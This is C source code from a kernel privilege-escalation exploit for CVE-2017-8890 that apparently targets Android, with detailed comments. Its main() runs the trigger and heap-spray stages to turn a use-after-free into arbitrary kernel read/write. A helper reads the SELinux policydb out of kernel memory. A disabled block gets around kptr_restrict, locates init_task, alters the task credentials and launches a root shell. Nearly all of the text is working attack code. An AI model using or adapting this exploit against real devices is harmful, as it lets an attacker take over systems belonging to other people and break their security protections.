/*
 * Entry point: runs the exploit stages in a fixed order and then polls the
 * kernel-read probe until it succeeds.  argc/argv are unused.
 *
 * Returns 0 once the probe read succeeds; a failed prepare()/trigger() stage
 * terminates the process through err() instead of returning.
 */
int main(int argc, char *argv[])
{
    cpu_num = sysconf(_SC_NPROCESSORS_CONF);  /* global; configured (not necessarily online) CPU count */
    setbuf(stdout, NULL);                     /* unbuffered stdout so progress lines survive a crash/panic */
    printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num);
    printf("%s(), getpid : %d, gettid() : %d\n", __func__, getpid(), gettid());
#if FORKCHILD
    /*
     * Optional: fork children_num children that busy-loop forever.  The
     * fork() result is stored in child[x] but never checked for -1, and
     * the children are never reaped by this function.
     */
    int x;
    for ( x = 0; x < children_num ; x++ ) {
        if ( (child[x] = fork() ) == 0 ) {
            printf("I'm child : %d\n", x);
            while(time((time_t*)NULL));   /* time() is non-zero in practice, so the child never exits */
        }
    }
#endif
    init_fake_obj();
    cpuid = sched_getcpu();                   /* global; CPU this thread is currently running on */
    if (prepare() < 0 )
        err(-1,"prepare failed..");           /* err() exits; status -1 is reported as 255 */
    if (trigger() < 0 )
        err(-1, "trigger failed...");
    keep_spraying(100);
    char tester[8] = {};                      /* NOTE: empty initializer is a GNU/C23 extension, not C11 */
    /*
     * read_at_address_pipe() returns 0 on success (same convention as in
     * get_types_fa()).  Poll a fixed address until a 4-byte read succeeds;
     * the bytes landing in tester are never used afterwards.  There is no
     * retry limit, so this loops forever if the primitive never works.
     */
    for (;;) {
        if (!read_at_address_pipe((void*)0xFFFFFFC000080000LL, &tester, 4)) {
            printf("Turn UAF to arbitrary read/write succeeded.\n");
            break;
        }
    }
#if 0
    /* Disabled post-exploitation stage; compiled out. */
    printf("[!] we're trying to find ksyms firstly.\n");
    if ( 1 != break_kptr_restrict() )
        err(-1, "ksym not found.");
    init_task = (size_t)get_kallsym_address("init_task", NULL);
    printf("init_task : %p\n", (void*)init_task);
    found_tsk_by_swapper(init_task); /* in post_exp.c */
    system("/system/bin/sh");
    while(1);
#endif
    return 0;
}
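/*
 * Copy the kernel's policydb (the global `policydb` holds its kernel address;
 * from the field names this appears to be the SELinux policydb) into a
 * temporary user-space buffer via read_at_address_pipe() and return the
 * pointer stored in sym_val_to_name[SYM_TYPES].
 *
 * Returns NULL when `policydb` is not set, when the temporary buffer cannot
 * be allocated, or when read_at_address_pipe() reports failure (non-zero,
 * matching its use in main()).  The returned pointer is annotated __kernel:
 * it is a kernel-space address, not a user-space pointer, and is only
 * meaningful as an argument to the read primitive.
 *
 * Changes from the previous version: the `policydb` check precedes malloc()
 * so the not-yet-set path no longer allocates and frees, the goto/label
 * cleanup is replaced by early returns, and the prototype is `(void)`.
 */
static inline struct flex_array* __kernel get_types_fa(void)
{
    if (!policydb)
        return NULL;

    struct policydb* pdb = malloc(sizeof(*pdb));
    if (!pdb)
        return NULL;

    struct flex_array* __kernel fa = NULL;
    /* 0 means the read succeeded and pdb now holds a copy of the kernel struct. */
    if (!read_at_address_pipe(policydb, pdb, sizeof(*pdb)))
        fa = pdb->sym_val_to_name[SYM_TYPES];

    free(pdb);
    return fa;
}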